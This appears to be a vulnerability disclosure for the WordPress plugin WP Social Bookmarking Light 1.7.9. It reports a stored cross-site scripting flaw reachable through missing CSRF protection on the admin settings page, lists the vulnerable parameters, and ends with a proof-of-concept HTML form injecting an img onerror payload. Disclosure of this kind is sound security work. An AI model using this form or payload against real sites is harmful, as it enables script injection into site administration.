Hello,

Plugin: WP Social Bookmarking Light 1.7.9 https://wordpress.org/plugins/wp-social-bookmarking-light/

1. Persistent Cross-Site Scripting (XSS)

Authenticated administrators can store html/js code (there is no CSRF protection).

Method: POST

Url: http://localhost/wp-admin/options-general.php?page=wp-social-bookmarking-light%2Fmodules%2Fadmin.php

Vulnerable parameters: services, styles, mixi[check_key], mixi[check_robots], mixi_like[width], twitter[via], facebook[locale], facebook_like[width], facebook_share[width], facebook_send[width], facebook_send[height], tumblr[button_type], atode[button_type], google_plus_one[inline_size], line[button_type]

Example PHP callstack:

wp_social_bookmarking_light_options_page   [/wp-social-bookmarking-light/modules/admin.php:326]

Verification:

--

<form method="POST" action="http://localhost/wp-admin/options-general.php?page=wp-social-bookmarking-light%2Fmodules%2Fadmin.php" />

<input type="text" name="save" value="1" />

<input type="text" name="services" value='"><img src=x onerror=alert(1) /> ' />

<input type="submit" />

</form>

--